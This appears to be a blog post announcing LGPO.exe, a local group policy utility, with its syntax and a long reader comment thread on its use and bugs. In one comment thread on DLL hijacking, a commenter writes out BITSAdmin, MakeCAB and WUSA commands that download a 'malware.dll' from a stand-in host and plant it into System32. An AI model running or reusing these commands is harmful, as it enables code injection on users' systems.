LGPO.exe – Local Group Policy Object Utility, v1.0


LGPO.exe is a new command-line utility to automate the management of local group policy. It replaces the no-longer-maintained LocalGPO tool that shipped with the Security Compliance Manager (SCM), and the Apply_LGPO_Delta and ImportRegPol tools.

Features:

  • Import settings into local group policy from GPO backups or from individual policy component files, including Registry Policy (registry.pol), security templates, and advanced auditing CSV files.
  • Export local policy to a GPO backup.
  • Parse a Registry Policy (registry.pol) file to readable "LGPO text" directly to the console or redirected to a file which can edited and imported into local policy.
  • Build a new Registry Policy (registry.pol) file from "LGPO text".
  • Enable group policy client side extensions for local policy processing.

The zip file attached to this post includes LGPO.exe and full documentation. This is the command line syntax:

LGPO.exe v1.00 - Local Group Policy Object utility

LGPO.exe has four modes:
  * Import and apply policy settings;
  * Export local policy to a GPO backup;
  * Parse a registry.pol file to "LGPO text" format;
  * Build a registry.pol file from "LGPO text".

To apply policy settings:

    LGPO.exe command [...]

    where "command" is one or more of the following (each of which can be repeated):

    /g path               import settings from one or more GPO backups under "path"
    /m path\registry.pol  import settings from registry.pol into machine config
    /u path\registry.pol  import settings from registry.pol into user config
    /s path\GptTmpl.inf   apply security template
    /a[c] path\Audit.csv  apply advanced auditing settings; /ac to clear policy first
    /t path\lgpo.txt      apply registry commands from LGPO text
    /e <name>|<guid>      enable GP extension for local policy processing; specify a
                          GUID, or one of these names:
                          * "zone" for IE zone mapping extension
                          * "mitigation" for mitigation options, including font blocking
                          * "audit" for advanced audit policy configuration
    /boot                 reboot after applying policies
    /v                    verbose output
    /q                    quiet output (no headers)

To create a GPO backup from local policy:

    LGPO.exe /b path [/n GPO-name]

    /b path               Create GPO backup in "path"
    /n GPO-name           Optional GPO display name (use quotes if it contains spaces)

To parse a Registry.pol file to LGPO text (stdout):

    LGPO.exe /parse [/q] {/m|/u} path\registry.pol

    /m path\registry.pol  parse registry.pol as machine config commands
    /u path\registry.pol  parse registry.pol as user config commands
    /q                    quiet output (no headers)

To build a Registry.pol file from LGPO text:

    LGPO.exe /r path\lgpo.txt /w path\registry.pol [/v]

    /r path\lgpo.txt      Read input from LGPO text file
    /w path\registry.pol  Write new registry.pol file

(See the documentation for more information and examples.)

[Update: the latest version of LGPO.exe is here.]


Comments (75)

  1. O.K. says:

    Why is there no Support for MLGPO?

    [Aaron Margosis] I've never had a need for it, and no one in any of the customer spaces I've worked with has ever asked me to add that.

  2. Nils T says:

    Hi,
    with the deprecated LocalGPO tool you could create the LocalGPO Packs and apply those from the commandline to specific users. i think im talking about the same this as the poster above.
    This was really handy in some situations before.
    So even if it is not implemented yet is it possible to integrate this in the future to apply registry.pol files or LGPO Texts to specific user accounts only?

  3. CSM says:

    Hi,

    Thank you for your excellent work. We make heavy use of the mlgpo function as well, it adds a flexibility I cannot find an easy replacement for. Any chance of adding that functionality back in?

    [Aaron Margosis] I'll raise the priority. Note also that while LocalGPO is not being maintained, it can still be downloaded with the SCM.

    Can you describe in more detail how you use MLGPO and the value it provides? Thanks.

  4. Chris says:

    Any chance the LGPO source code will be posted as with the old tools? It makes it way easier for software to be approved for use if the source is available.

    [Aaron Margosis] Probably not this time. This one is digitally signed, though.

  5. Ken says:

    When applying multiple registry-based commands from an “LGPO text” file using the /t command and then sysprep a W10v1511 getting [0x0f0083] SYSPRP ActionPlatform::LaunchModule: Caught an unhandled exception while trying to load and execute 'ProvPackageSysprepGeneralize' from C:WindowsSystem32ProvSysprep.dll – normally these LGPO text files are about 10 or so files but place it into one file / remove user and only computer settings, same error. Remove the LGPO /t settings and it will sysprep. These are set in a MDT task sequence

    [Aaron Margosis] Based on your description, it doesn't sound like the LGPO tool is the cause — more like the policies you're pushing in are causing Sysprep to fail somehow.

  6. Omar says:

    Hello I just wanted to weigh in. We too use the MLGPO command from LocalGPO extensively when deploying kiosk and some user computers. It allows to set policies to specific users. This has become a vital component in our environment, if I could use LocalGPO
    with windows 10 I would, LocalGPO does a great job of applying machine policies but does not have the ability to restore or set MLPGO policies on Windows 10 Devices.

    If LGPO has this functionality I would be a happy camper 🙂

    Issues with LocalGPO on Windows 10
    I have patched the file so that it may work on windows 10, heres the link
    https://social.technet.microsoft.com/Forums/en-US/e98d8ac5-b091-4209-bc0d-02ba020666e0/localgpo-tool-for-windows-81?forum=compliancemanagement

    If I run:
    cscript "C:Program Files (x86)LocalGPO"LocalGPO.wsf /Restore
    I receive:
    (1403, 10) WshShell.Run: Unable to wait for process.

    If I run:
    cscript "C:Program Files (x86)LocalGPO"LocalGPO.wsf /Path:"C:Program Files ……. /MLGPO:kiosk
    I receive:
    Windows XP and Windows Server 2003 do not support MLGPO!!

    I understand LocalGPO was not created for Windows 10 but if MLGPO becomes a part of LGPO that would be very beneficial. Thank You

  7. Jason Walker says:

    I'm having an issue with importing audit.csv settings, on Win 7 Enterprise x64.

    If I import with "/a" (do not clear existing settings), the new setting appears to be active according to auditpol.exe /get, but the System32GroupPolicyMachinemicrosoftwindows ntauditaudit.csv is not updated, and at the next 'gpupdate' the setting reported by auditpol.exe reverts to the previous value defined in audit.csv.

    If I import with "/ac" (clear existing settings), the copy of audit.csv at system32grouppolicymachinemicrosoftwindows ntauditaudit.csv is replaced with the new value and everything appears to work.

    Am I doing something wrong here?

    [Aaron Margosis] No, that's the best that LGPO.exe can do, at least for now. What appears in the Group Policy editor is not necessarily what's actually in effect. See this Ned Pyle blog post for more information.

    The LGPO.exe documentation says this:

    /a[c] pathaudit.csv

    Apply an Advanced Auditing backup (CSV) file. With /ac, LGPO.exe clears existing Advanced Auditing settings before applying the settings from the CSV file, and copies the file to the local group policy subdirectory so that the settings appear in the local group policy editor.

  8. CSM says:

    We use MLGPO to apply policies specific to users and groups of users. It is primarily used on non-domain systems to establish policies for non-admins, both on workstations and terminal servers. It is also a key component of kiosk systems for us as well.
    Apologies for the late reply.

  9. Jason Walker says:

    Maybe I'm missing something. I don't think this is only limiting the ability to view values in the group policy editor.

    After executing lgpo.exe /a , the results of "auditpol.exe /get" reflect the new value, but _only_ until the next gpupdate executes. After gpupdate executes, the system reverts back to the previous setting (which remained defined in audit.csv). Does this imply that lgpo.exe /a is ineffective at permanently adding advanced audit settings?

    I'm going to attempt to workaround this in script, by retrieving the current audit.csv, modifying it to merge in the new values I wish to apply, then using lgpo.exe /ac to apply the now-complete audit.csv. That's still more complex than what I had hoped for when I saw this new tool appeared to be able to modify the advanced audit settings.

    [Aaron Margosis] Your analysis is correct. With /a, lgpo.exe invokes "auditpol.exe /restore" but as you point out that doesn't touch the local policy store. I had wanted to avoid having to write an audit.csv parser, let alone an audit.csv editor. That may be needed if lgpo.exe is to be a complete solution.

  10. Jason Walker says:

    I don't want to sound unappreciative on the audit policy restore. Parsing the CSV myself and applying with LGPO.exe /ac is working like a charm, and it's very nice to have Secedit policy, Registry policy, and Audit policy all in one tool. Thanks much, this tool is looking to be very helpful for me!

    [Aaron Margosis] I'm glad it's of help. And I appreciate the helpful feedback.

  11. Chuck says:

    In using LGPO's "Exporting local policy to a GPO backup" the files Backup.xml and Bkupinfo.xml have "Contoso.test" in all of the domain name references. The local policy that was backed up came from a domain workstation at work. Maybe I don't fully understand how GPO backup (and restore) works, but should these two files be referencing contoso or should the real domain name be stored in those two files?

    [Aaron Margosis] The "real domain name" in this case would be the local computer name, which wouldn't be of any interest on any other computer.

  12. Chuck says:

    Thanks for the quick reply, Aaron. Apologies — I should have stated my whole concern in the first post. I'd like to take this LGPO backup from a test suite and import it into a production suite. How do those references to domain "Contoso.test" resolve when restoring this backup into a different domain? Or, is some kind of manual editing needed to make the LGPO backup suitable for restoring in a different domain? Thanks again.

    [Aaron Margosis] From what I've seen, it's not an issue. I pretty much copied what the older LocalGpo tool did in this regard, and I don't remember hearing of any problems with it. If I remember correctly, the way I've seen this work is to create a new GPO in AD, then choose Import Settings and pick the local backup. I don't think the "Contoso" designations matter at that point – I believe the import picks up only the settings.

  13. Joe says:

    Hi Aaron,

    We basically came across your Tool as our requirements lead us to get around 200+ Workgroup Servers in our DMZs to apply a Set of Settings from Local Group Policies.
    So as I understand that right, i will just take a GPO from our Domain, Export it and Import it with LGPO.exe /g Path – so thats straight Forward.
    What i miss here (or have i missed it?) is the possibility to reset the Settings to Default – as when i Import an previously exported "empty" GPO, that won't Change anything.
    As you can imagine – when I deploy those Settings to a couple of hundred Servers, I do need a way back 😉

    Thanks!

    [Aaron Margosis] It depends on the settings. On the whole, you should capture a backup before you apply the new settings. Note though that some settings that can be applied through a security template don't show up in backups. Advanced Auditing settings shouldn't be a problem. For the registry.pol settings (Administrative Templates and a few others), you could probably delete the registry.pol files and apply the ones you captured in a backup.

    FWIW, I never trusted the "restore OS default" mechanism that the old LocalGPO script implemented, and I opted not to try to implement it in LGPO.exe.

  14. CSM says:

    I am still looking for a way to make this work in 2016/Windows 10, I am happy to work with the old vb script to try and get it working, but I would appreciate any suggestions you might have on how to adjust that script so it works properly in the new OS. Thank you.

    [Aaron Margosis] I assume you're referring to the not-yet-implemented MLGPO feature.

    I don't know whether this is a complete fix, but edit LocalGpo.wsf, find the line that says

            If(Left(strOpVer,3) = "6.2") and (strProductType <> "1") then

    and in that block, add something like this (NOT TESTED):

            If(Left(strOpVer,3) = "10.") then

    Keep the assignment the same for this case:

        strOS = "Win8"

    If you assign it something like "Win10" the rest of the script won't recognize it.

  15. MsHS says:

    I'd also like to add my request to have MLGPO functionality added. In our organization we'd like to be able to apply specific policies to select users on workstations and kiosks so this functionality is very useful. Thank you.

  16. Jason Walker says:

    Is there any ability to remove a setting from Registry.pol (i.e. changing to "Not Configured") using the LGPO text format?
    According to the PDF, the "DELETE" action behaves as "Deletes the value (reverting a policy to "Not Configured" – but the behavior I see from trying to remove the value HKLMSoftwareTestNewValue from management is that the "SoftwareTest;**del.NewValue;%01;%04;" directive is added to Registry.pol, so the value is removed from the Registry each time Group Policy is reapplied. That's not equivalent to "Not Configured", that's actually "Managed Removal of Registry Key".

    What I'm looking for is an ability to "Un-Do" the management of a registry key value, to have no reference to that key remaining in Registry.pol. Is there a better option than 1) Dump current registry.pol to text 2) Delete the reference in the text export 3) Delete registry.pol 4) import the modified text?

    [Aaron Margosis] I think that's probably the best way. LGPO.exe doesn't have the ability to edit the registry.pol file directly.

  17. Consider this another vote for MLGPO support. The GPOPack.wsf from SCM / MDT can copy to MLGPO, but unfortunately does not merge settings, it only overwrites them. Having a single tool that can handle all the forms of Local Group Policy would be great.

  18. MT says:

    Aaron,
    We could use LocalGPO.wsf to make "MSS:" settings editable: Cscript LocalGPO.wsf /ConfigSCE. You stated that LogalGPO tool won't be supported any longer. What should we use as a replacement in order to be able to work with "MSS:"?
    Thank you.

    [Aaron Margosis] We included a replacement in the Win10 baselines in the form of a custom ADMX and ADML file. Install those files in the appropriate locations and then find the settings in your Group Policy editor in Computer Configuration | Administrative Templates | MSS (Legacy).

  19. Fred says:

    Hi Aaron,

    thank you very much for your good work.
    We`re using LGPO.exe quite often for exporting local machine / user policy’s .
    After that we deploy/import them on other system.

    One question…
    Is it possible to empty/clear/reset a local machine/user config ?
    So that every local policy is set to “not configured” ?

    Thanks in advance

  20. Sarah says:

    [Obligatory preface] Hi, please forgive me in advance, as I am a very fresh IT intern at an incredibly disorganized (and under-staffed!) non-profit. My main task as of late is configuring many new machines -most of which we don’t have images for- so I’m building these from scratch and implementing all of the necessary configurations. We also are running Server 2003, but are receiving a large influx of Surface tablets (that I cannot image, or basically have fumbled around with third party imaging software for long enough that I gave up due to time constraints) and I’m looking for a utility to streamline part of this process. I have no experience with this utility and its functionality, and my scripting knowledge is similarly limited.

    I am looking to simply replicate my Local Group Policy settings via script, and from what I’ve read, this utility should be able to manage that for me very simply. As I’ve mentioned before, I have limited access to the domain, etc, so I’m relying on all of this being done on the local machine’s admin account.

    I’ve downloaded the zip file (https://msdnshared.blob.core.windows.net/media/TNBlogsFS/prod.evol.blogs.technet.com/telligent.evolution.components.attachments/01/4062/00/00/03/65/94/81/Windows%2010%20TH2%20Security%20Baseline.zip) and extracted it, I’ve read through the documentation provided, but am experiencing issues (probably a very simple command line error) getting the utility to run on my Win 10 machine. After having several goes at installing the client and running the application, I still receive an error when attempting to run the LGPO.exe command (etc) to export my Group Policy configuration to the specified path.

    Is there perhaps a manual for novices like myself trying to take a crack at this utility? Thanks in advance for your help, and I appreciate any response as I know it may be frustrating dealing with a ‘green’ tech.

    1. Sarah says:

      My apologies, the error I mentioned before states that the LGPO.exe isn’t found/cannot be located.

      [Aaron Margosis] In the zip file, LGPO.exe is in the “Windows 10 TH2 Security Baselines\Local_Script\Tools” folder.
  21. S Sims says:

    We are using the LGPO.exe tool to export Local Group Policy settings in Windows 10 (using LGPO.exe /b) and then import the settings on other Windows 10 PCs (using LGPO.exe /g). All of the PCs are standalone PCs and are NOT networked or part of a domain. We have noticed some issues when exporting/importing. All of the issues appear to relate to the audit.csv file. We are using the “Advanced Audit Policy Configuration” so the policy “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” is enabled.

    1 – The LGPO tool attempts to overwrite the audit.csv held on the local machine (in C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit). However, during testing it was apparent that this sometimes fails despite being run with admin privileges. The LGPO tool does report the failure but it’s easy to miss. If it does fail then your policy settings in [Computer Configuration->Windows Settings->Security Settings->Advanced Audit Policy Configuration] will not be applied. We have found the most reliable work around to this is to manually delete the audit.csv in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit” before performing an LGPO import.

    2 – When LGPO perform the export, it does NOT copy the audit.csv file in “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”. Instead, it builds the audit.csv file from all of the local group policy settings defined in the “Advanced Audit Policy Configuration”. This generated audit.csv is then copied to the Audit directory on the target PC when the LGPO import is performed. We have experienced some strange desktop issues once the import is applied on another PC. The issue is not immediately apparent and requires a PC reboot. The main error that we have encountered is : “c:\windows\system32\config\systemprofile\desktop is unavailable”. In addition, the Start Menu is unavailable and other components such as OneDrive appear to fail. Through the process of elimination we have narrowed these errors down to one single line entry in the exported audit.csv file :

    ,,FileGlobalSacl,,,,

    If this line is removed from the exported audit.csv file then we do not encounter any problems. Assuming the export is to the C:\Temp directory, our current work-around is to :

    Step 1 – Export the Local Group Policy Settings using : LGPO.exe /b C:\Temp\
    Step 2 – Overwrite generated audit.csv file in “C:\Temp\{GUID}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv” with the audit.csv from “C:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit”.
    Step 3 – Import the Local Group Policy settings on another PC using : LGPO.exe /g

    Unless configured, the audit.csv copied in Step 2 will not contain the FileGlobalSacl definition.

    [Aaron Margosis] That’s very strange. What errors is LGPO reporting? FWIW, LGPO.exe /b captures the full set of existing advanced auditing settings with “auditpol.exe /backup”. That can be different from what’s in the Group Policy directory. That’s odd that application of the default FileGlobalSacl setting would cause problems like that, particularly the Start menu failure. I have to suspect that there are other things going on at the same time. Are you applying AppLocker rules? I’ve seen misapplication of AppLocker cause the Start menu to fail.
    1. S Sims says:

      LGPO doesn’t report any errors when we do an import (using /g). It’s only evident that a problem has occurred on reboot (gpupdate /force doesn’t cause it to fail). Yes we are applying AppLocker rules so I will double check those. It does look like the audit.csv is causing the problem though since replacing the exported audit.csv with the one held on the local machine appears to fix the problem.

  22. Chilli Peppa says:

    Can this executable be redistributed in a commercial product? I didn’t see any license information in the documentation.

    [Aaron Margosis] No. Please link back to this site. Thanks.
  23. Pete says:

    the LGPO Utility errors out when you set MaximumPasswordAge=0 If I change it to any other number it works fine. (I also have MinimumPasswordAge=0)

    [Aaron Margosis] This is kind of a weird one. If you go into the Security Templates GUI and set Maximum Password Age to 0, it actually writes -1 in the security template file. If you manually edit the security template file and put MaximumPasswordAge = 0, it’s an invalid value.
  24. Kevin says:

    Consider this another vote for MLGPO support, I work in a library and all of our Public workstations are on a completely separate network far away from our Domain server. I use MLGPO on all of these public workstations to limit what the users have access to on these machines.

    [Aaron Margosis] Vote acknowledged. Thanks for the feedback.
  25. Eddy Current says:

    You forgot to inhibit that LGPO.exe can be run on Windows Vista, Windows 7 and Windows Server 2008 [R2] when KB2533623 is not installed there!
    CWE-426 and CWE-427 should really be well-known after 15+ years now!

    [Aaron Margosis] Can you provide repro steps for an actual compromise? When LGPO.exe starts external processes, it always specifies the full path. LGPO.exe cannot enforce that the system is up to date, nor that it is not in a user-writeable directory and has not been modified.
    1. Eddy Current says:

      LGPO.exe loads api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll
      These files don’t exist on Windows 7 and earlier.
      Take a look at recent MSRC bulletins: this vulnerability was fixed in some Windows components (and still needs to be fixed in quite some more)

    2. Eddy Current says:

      Please eat your own dogfood!
      Call one of the new Win32 APIs introduced with KB2533623, for example (really: best) SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32)
      This removes the “application directory” from the DLL search path.
      DEFENSE IN DEPTH — the !Microsoft way

    3. Eddy Current says:

      Under the user account created during Windows setup run the following command lines from Start->Run:

      BITSAdmin.exe /Transfer foobar http://example.com/malware.dll “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll”
      MakeCAB.exe “%TEMP%\ext-ms-win-kernel32-package-current-l1-1-0.dll” “%TEMP%\foobar.cab”
      WUSA.exe “%TEMP%\foobar.cab” /Extract:”%SystemRoot%\System32″

      1. If you’re starting LGPO.exe in a directory the attacker controls, the attacker can also modify LGPO.exe directly. And if the attacker can write arbitrary content into the System32 directory, it’s already game over.
        1. Eddy Current says:

          LGPO.exe is digitally signed with a Microsoft certificate, tampering with the binary invalidates it signature.
          The unmodified, signed and trusted binary but loads and executes untrusted code when run from an untrusted location.

          Default installations of Windows allow users to write to System32, WITHOUT triggering an UAC prompt!
          Is this “game over” enough?

          [Aaron Margosis] That’s not true, and you should already know that. Good night.
        2. Eddy Current says:

          If you start LGPO.exe under Windows 7 (this is the Windows version with the biggest market share) from a trusted directory it will load api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, api-ms-win-appmodel-runtime-l1-1-1.dll and ext-ms-win-kernel32-package-current-l1-1-0.dll from the PATH
          GET A CLUE!

          1. Mr. Current: not only are you the rudest troll to infect any blog I’ve worked on, you’re also not as clever as you think you are. Ordinarily, I’d patiently explain why you’re mistaken, but I’m not going to waste any more of my time on you. And all future ill-mannered comments from you get deleted. Good night.
          2. [Aaron Margosis] In case anyone was wondering, yes, Mr. Current became only more insulting, so those follow-ups have been unpublished. There’s absolutely no call for rudeness, disrespect, or insults, and I won’t allow it on any blog I control. You are free to disagree with me, and to prove me wrong about a technical issue, as long as we are engaged in respectful and civil conversation. I don’t care how ugly the rest of the internet is, ugly’s not happening here.
  26. Eddy Current says:

    LGPO.exe SHOULD write a warning to stderr when it creates text output files which can’t restore the registry.pol completely, but write
    ;;; —- Commented out because “LGPO.exe /t” cannot process this command
    to stdout.

    OTOH processing/implementing of REG_QWORD for export and import should be possible: SAFER rules need this, for example.

    JFTR: why did you “invent” your own format for the LGPO text files? The well-known format of registry entries in .INF files is a single line and should be easier to parse/implement!

    [Aaron Margosis] Good idea about outputting to stderr when registry.pol commands can’t be handled correctly.

    I hadn’t implemented QWORD because I hadn’t come across an actual need and no one had asked for it. Are you actually implementing SAFER rules? I haven’t seen anyone use those in well over a decade.

    I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values, deleting a value, and deleting all values in a key.

    1. Eddy Current says:

      | Are you actually implementing SAFER rules?

      Of course, since more than 12 years, on all versions and editions of Windows.

      | I haven’t seen anyone use those in well over a decade.

      Better look at the bright side of life.-P

      | I created a new format because .inf syntax was insufficient to replicate the full set of commands that can be represented in a registry.pol file, including creating a key without values,

      That’s FLG_REG_KEYONLY, 0x10

      | deleting a value,

      That’s FLG_ADDREG_DELVAL, 0x4

      | and deleting all values in a key.

      Please dare to extend the existing format as necessary: you can always introduce new flags.
      My proposal is to reuse the existing and well-known “AddReg” syntax:
      ,[],[],[,]

      1. Eddy Current says:

        ARGH!
        The blog software sucks, it eats < and >
        | ,[],[],[,]

        hive,[key, name],[value name],flag|type[,value data]

    2. Jason Walker says:

      I too am using Software Restriction Policies (Safer) and am having trouble with LGPO’s lack of qword functionality. By failing to import the “LastModified” qword value, but still importing the remaining Software Restriction Policies, I end up with machines that not only fail SRP, but also cannot produce Group Policy Results from either the GPMC wizard or gpresult /h. Instead I get a message “object reference not set to an instance of an object”

      [Aaron Margosis] OK. I’ll add it to the list. I didn’t think anyone was still using SRP. What does it give you that you can’t get from AppLocker and/or Device Guard?
      1. Jason Walker says:

        Sorry for the late reply, I think I missed a notification on your comment.
        What Software Restriction Policies gets me, is actually very little. A percentage point on a CIS benchmark score and a security auditor who chastises me (a little) less.
        SRP is also available on Professional editions, where AppLocker requires Enterprise or Ultimate, but we are going third-party for whitelisting.
        I’ve since stopped trying to apply SRP policies with LGPO, but it’s been handling all my other (non-QWORD) tasks fine. I see there’s a LGPO 2.0 prerelease, I look forward to checking it out soon. Thanks for the great work and support!

  27. Justin Smith says:

    Can LGPO reset local policy, or be given a set of policy to _remove_?

    I’m trying to implement SAFER rules, and need a way to add/remove them on-demand.
    Yes, we’re actually using them, unless there’s a better way to block executables in %AppData%. As an MSP, our app lists are too large and varied to reasonably implement an Applocker whitelist.

    1. Re “reset”: If you mean to revert to “Not Configured,” no, not really. One way I’ve done it is to export the existing Registry.pol settings to a text file, edit the text file to remove the unwanted settings, delete the registry.pol file, then import the text file using LGPO.exe. The other way is to explicitly set the policies you want to remove to enforce the defaults.
    2. Eddy Current says:

      SAFER reads its rules and settings only from the registry, not from the registry.pol file.
      The registry.pol is maintained via secpol.msc and local security policies or group policies only, policies defined there will periodically be (re)written to the registry
      If you don’t use secpol.msc or GPO you can modify the registry on demand.

  28. This is… EXACTLY what I was looking for a long time now.
    It’s a good thing that you replaced that messed up LocalGPO with all those scripts and unnecessary additions, with this neat and straight forward tool that does it all.
    Thanks in advance. I really appreciate it!

  29. JW says:

    I currently use LocalGPo.wsf to create GPOPacks for use in MDT 2013. Having just found out that LocalGPO.wsf is deprecated and this tools is its replacement, can you explain how to create a GPOPack for use with MDT please.

    [Aaron Margosis] See the /b and /g command line options for capturing a backup of local policy and for applying a saved GPO backup to a system.
  30. Jeff Lawrence says:

    Can this handle policies with group policy registry preferences? I don’t see any syntax to apply a registry.xml as created by a preference.

    [Aaron Margosis] No, LGPO.exe doesn’t currently handle Group Policy Preferences.
  31. Joshua S says:

    Truly appreciate all the hard work on this!

    Ignore the trolls, and I vote to delete ALL posts by that dude.

    Lastly, PLEASE add support for MLGPO. I use it every week.

  32. Hi Aaron,

    I have seen that LGPO adjusts settings of my hardening template when configuring user rights.

    Is there a way to force the application of settings ?

    And, have you a list of settings which can be adjusted by LGPO ? Only user rights or are there other settings?

    Thanks

    Regards
    Greg

    [Aaron Margosis] Were you able to find the documentation? It can manage security template settings, advanced audit settings, administrative template (ADMX) settings, and anything else that lands in registry.pol.
  33. James says:

    Anyone manage to get this to apply an export successfully during an MDT task sequence? I’m trying to apply an export to Windows 10 RS1 via MDT 2013 Update 2. Create an application with source files, working directory is the application directory, with an installation batch file that just calls .\LGPO.exe /g .\. Always works when I run it manually, but when I run it from MDT I always get errors like this:
    Z:\Applications\LGPO>LGPO.exe /g .\
    LGPO.exe v1.00 – Local Group Policy Object utility

    Audit policy directory exists
    Copied .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
    to C:\windows\system32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csv
    Clearing existing audit policy
    Apply Audit policy from .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
    Apply security template: .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf
    Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]
    The system cannot find the file specified.

    The task has completed with an error.
    See log C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp for detail info.

    [[[ Security template log file output follows: C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp ]]]
    ——————————————-

    Wednesday, August 10, 2016 8:53:00 AM

    Warning 2: The system cannot find the file specified.

    Error opening Z:\Applications\LGPO\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf.

    Warning 6: The handle is invalid.

    —-Configuration engine was initialized with one or more errors.—-

    Any ideas?

    1. James says:

      I’m sure there are other ways, but my solution to get this working in MDT was to create and application with the exported GPO as the source files and include and installation batch file with it. The Quiet Install command for the application is install.cmd and the working directory is the application directory. The batch file copies the content locally, executes LGPO from there, and the cleans up. For some reason this worked but it always errored when running from the Application Directory.

      Batch file code:

      REM Create temp dir for source files
      md %temp%\LGPO_Inst

      REM copy files to local temp dir for execution
      xcopy *.* %temp%\LGPO_Inst /E /H /C /I /Q /Y

      REM switch to local temp dir for execution
      cd /d %temp%\LGPO_Inst

      REM Apply Local GPO
      LGPO.exe /g .\

      cd ..

      REM Cleanup
      rd %temp%\LGPO_Inst /s /q

    2. Thomas says:

      I have the same Problem by using LGPO tool. I always get “Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]”. What is the correct soloution? I don’t use MDT.

  34. TonyD says:

    Is there a way to enable the MSS hidden entries with this tool? The option for LocalGPO was /ConfigSCE. My GPO backup has some of these entries set but they do not show on my Windows 10 testing. Thanks.

    [Aaron Margosis] We moved the ancient “MSS” settings from Security Options to a custom Administrative Template. The mechanism that had been used to expose the MSS settings in Security Options had become unsupportable. The new custom ADMX and ADML establish the same registry settings, if you choose to configure them, but in a manner that is supportable. That custom template is included with the newer baselines, such as this one. Install those files in the appropriate locations and then find the settings in your Group Policy editor in Computer Configuration | Administrative Templates | MSS (Legacy).
  35. bitsmed says:

    I know I’m late, but regarding MLGPO, I found this folder to be very interesting: %WinDir%\System32\GroupPolicyUsers
    Here we have sid folders for user(s) who have their own gpo.
    To get sid: wmic useraccount get name,sid

  36. Rodney says:

    Aaron,

    Thank you for creating this tool. I am using it to create hardened baseline security configurations on standalone systems and I am exporting those security baselines to other standalone workstations. I have run into an issue though, when I export the LGPO policy, the GptTmpl “inf” file [file security] SACL are missing. I have to turn on auditing on several files and folders and I can’t seem to export the INF file template with the [File Security] settings.

    The LGPO “backup” feature depends on “secedit.exe /export” for the security template content, and “secedit.exe /export” doesn’t include file security settings. GptTmpl.inf is a text file, so I would suggest either copying your original GptTmpl.inf into the backup, or hand-editing the resulting GptTmpl.inf file to add in the file security content.
  37. Pete says:

    Am I missing something, or does this exe write to stderr instead of stdout?
    Entering the following in a cmd window:
    LGPO.exe 1>out.txt 2>err.txt
    writes all the output to err.txt instead of out.txt.
    This is the same for other calls to to LGPO.exe, e.g. using /g

    [Aaron Margosis] It writes banner text, diagnostic and progress information, and usage help text to stderr. It writes output including verbose logs (/v) and “LGPO text” (/parse) to stdout.
    [Aaron Margosis] BTW, have you tried the LGPO.exe v2.0 pre-release? Let us know whether it’s ready or still needs work.
  38. sefi says:

    Hi, is this tool can help me to import export group policy that I took from Active directory to local group policy in windows 7/10??

    [Aaron Margosis] Absolutely!
  39. RobertEarl says:

    I am having trouble using LGPO v1.00 to backup the policies on a Windows 10 machine. I get error 0x0000000D occurred:

    c:\program files\lgpo\lgpo.exe /b c:\GpoBackups

    LGPO.exe v1.00 – Local Group Policy Object utility

    Creating LGPO backup in “c:\gpobackups\{…..}”

    Executing command:
    c:\windows\system32\auditpol.exe /backup
    /file:”c:gpobackups\{…..]\domainSysvol\GPO\Machine\microsoft\windows nt\audit\audit.csv”

    Error 0x0000000D occurred:
    The data is invalid.

    External process exited with exit code 13
    _________________________________________________________________________________________________

    Any thoughts for me to try to get this to work????

    [Aaron Margosis] Is this on a US-English system or with a different language? Also, can you try with the pre-release LGPO v2 and see whether it still fails?
    1. RobertEarl says:

      It is on an English system and I have tried and I have tried with Version 2 and get the same error. This is on a Windows 7 system that was upgraded to Windows 10 in place.

      [Aaron Margosis] There was a bug in Windows 10 v1507 and v1511 (that I believe is fixed in v1607) in which the fullprivilegeauditing registry value in HKLM\System\CurrentControlSet\Control\Lsa was set to 0x80 instead of to 0x00 or 0x01, which caused both Auditpol.exe /get and Auditpol.exe /backup to report the same error you mentioned. LGPO.exe has code that works around that error. Perhaps there’s another registry value with a similar problem on your system. Can you post the results of this command in your next comment? Thanks.

      reg.exe query hklm\system\currentcontrolset\control\lsa

      1. RobertEarl says:

        Here you go sir.

        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa

        auditbasedirectories reg_dword 0x0
        auditbaseobjects reg_dword 0x0
        bounds reg_binary 0030000000200000
        limitblankpassworduse reg_sword 0x1
        nolmhash reg_dwors 0x1
        notification packages reg_multi_sz scecli
        authentication packages reg_multi_sz msv1_0
        crashonauditfail reg_dword 0x0
        disabledomaincreds reg_dword 0x0
        everyoneincludesanonymous reg_dword 0x0
        forceguest reg_dword 0x0
        fullprivilegeauditing reg_binary 3000
        lmcompatibilitylevel reg_dword 0x1
        lsapid reg_dword 0x29c
        producttype reg_dword 0x4
        restrictanonymous reg_dword 0x1
        restrictanonymoussam reg_dword 0x1
        scenoapplylegacyauditpolicy reg_dword 0x1
        secureboot reg_dword 0x1
